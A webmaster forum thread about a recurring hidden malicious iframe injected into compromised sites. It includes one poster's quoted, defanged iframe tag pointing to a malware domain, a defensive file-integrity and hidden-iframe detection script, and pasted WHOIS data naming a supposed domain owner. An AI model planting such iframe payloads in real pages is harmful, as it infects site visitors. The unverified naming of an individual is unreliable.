I need some help. Is there not a way to stop someone from inserting malicious iframe code into my websites? I've changed the ftp/cpanel passwords and somehow the code keeps getting back in. Wouldn't it be easy for someone to write some sort of script that checks your site files for the iframe tag and deletes it as soon as it finds it? Or a script that emails the owner as soon as new code is added to a file, so you know if something has changed and you didn't do it? There must be a fairly easy fix to this problem. Can anyone help? Thanks!
How does your site behave when the malicious iframe code is inserted into your pages? Did you contact your host about it?
I don't notice any difference. No popups or anything, but who knows if it's dropping a trojan horse or something onto people's computers. stopbadware says it's something about gogo2 malicious code. I'll have to contact my hosting company I guess, but I thought for sure someone would have figured out a stop to this type of thing by now.
This is Gogo2me hidden iframe injection. It silently installs spyware on your site visitors' computers and makes your site blacklisted by Google and Firefox. http://www.UnmaskParasites.com/security-report/?page=www.movieplanets.com Most likely it has to do with compromised ftp passwords stolen from your computer by spyware. Scan your computer for spyware, then change FTP passwords and don't store them inside FTP programs.
I had the same problem. I contacted my hosting company. They said that my hosting cpanel was hacked (source of attack unknown). I have changed all my passwords (cpanel, ftp, email etc.). Most of my sites were infected by the following iframe tag. < i frame src="http://bestlotron[dot]cn/in[dot]cgi?cocacola57" width=1 height=1 style="visibility: hidden"></ifr ame> It was auto-installing some files in .pdf file -------------------------------------------------- I ran a virus check on my PC and found a bunch of trojans hidden in the windows/system folder. Now it's all clean.
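The kind of check asked about at the top of this thread, as an added example that is not part of any poster's message: it hashes web files against a saved baseline and flags iframes hidden the way the tag above is (1x1 size or a hidden style). The extension list, function names and sample markup are constructed assumptions.

```python
import hashlib
import re
import tempfile
from html.parser import HTMLParser
from pathlib import Path

WEB_EXT = {".html", ".htm", ".php", ".js", ".tpl"}  # assumed set of web file types
HIDDEN_STYLE = re.compile(r"visibility:hidden|display:none")
# Constructed sample modelled on the tag shape in the post; placeholder domain.
SAMPLE_INJECTED = ('<p>hi</p><iframe src="http://malicious.example.invalid/in.cgi?x" '
                   'width=1 height=1 style="visibility: hidden"></iframe>')

class _IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # attribute names arrive lower-cased
        style = re.sub(r"\s+", "", (a.get("style") or "").lower())
        dims = {(a.get(k) or "").lower().replace("px", "").strip() for k in ("width", "height")}
        if dims & {"0", "1"} or HIDDEN_STYLE.search(style):
            self.hits.append(a.get("src") or "")

def find_hidden_iframes(text):
    """Return the src of every iframe that is tiny or styled invisible."""
    finder = _IframeFinder()
    finder.feed(text)
    finder.close()
    return finder.hits

def snapshot(root):
    """Map each web file (path relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file() and p.suffix.lower() in WEB_EXT}

def audit(root, baseline):
    """Compare the tree to a trusted baseline; return (changed, removed, flagged)."""
    current = snapshot(root)
    changed = sorted(f for f in current if baseline.get(f) != current[f])
    removed = sorted(f for f in baseline if f not in current)
    texts = {f: (Path(root) / f).read_text(errors="replace") for f in current}
    flagged = {f: h for f, t in texts.items() if (h := find_hidden_iframes(t))}
    return changed, removed, flagged

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:  # constructed demo tree
        page = Path(d, "index.html"); page.write_text("<p>hi</p>")
        base = snapshot(d); page.write_text(SAMPLE_INJECTED)
        print(audit(d, base))
```

An iframe written out by script (for example through `document.write`) is not parsed as a tag here, so the hash comparison is what catches that case. Keep the baseline somewhere the web account cannot write to.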
I advise all to use Virtual PC or VirtualBox while you access your cpanel and other ftp programs, and never ever use the virtual PC to access other stuff. I follow the same way. It's hard to follow, like using a virtual PC for all your needs, but it's good when you use it only for small stuff. I use separate virtual PC computers for my net banking and hosting stuff.
Hey, I had about 6 customers with the same problem and I developed a script to clean their server. It took place in LT's servers; many people got mad and blamed it on LT because of a hacking that took place a while back and all that stuff... Anyways, I'm a system and security administrator. Please check sysrenan.com (not done) and let me know if you're interested. Look forward to talking to you.
Your web host is not very good if they can't determine the source of the hack. Surely they have logs to check who was logged in and when and what IP address, and the http raw logs to see if a web application exploit was used to gain access. If there are no signs of attack from either of those then the server must be compromised, because it doesn't seem that they have secured their server very well. They should have internal integrity checkers to make sure no system files are modified etc., and notification if anyone logs in via ssh or brute forces anything. If this continues to happen I'd consider moving to a more stable and secure host.
Read my reply at this: http://forums.digitalpoint.com/showthread.php?p=10930463 Maybe resolved. At this time more servers were infected by this. Cause rooted
This is the person who owns the domain...
Domain Name: bestlotron.cn
ROID: 20081108s10001s82359738-cn
Domain Status: clientTransferProhibited
Registrant Organization: Raymond Keaton
Registrant Name: Raymond Keaton
Administrative Email: @cybernauttech.com
Name Server: ns1.freednshostserver.com
Name Server: ns2.freednshostserver.com
Registration Date: 2008-11-08 16:07
Expiration Date: 2009-11-08 16:07
I got the same problem with some of my friends - and every time it was when they accessed their website from a "foreign" machine without proper antivirus software installed. My solution to that is to keep my antivirus base up-to-date. I think trying to determine the source will not help much; there are thousands of viruses and hacking methods. As this time it was a cpanel hack, I would consider changing the hosting company. Hosts with quality services usually detect and maybe even solve such problems much faster than you may notice. A script will not help you, imo; it's the responsibility of the host to prevent such happenings.
What good will that do if the host OS is infected and sniffing ftp passwords? The guest OS in Virtual PC/VMWare will still send them in clear text and your host OS will route the information, giving the virus access to it.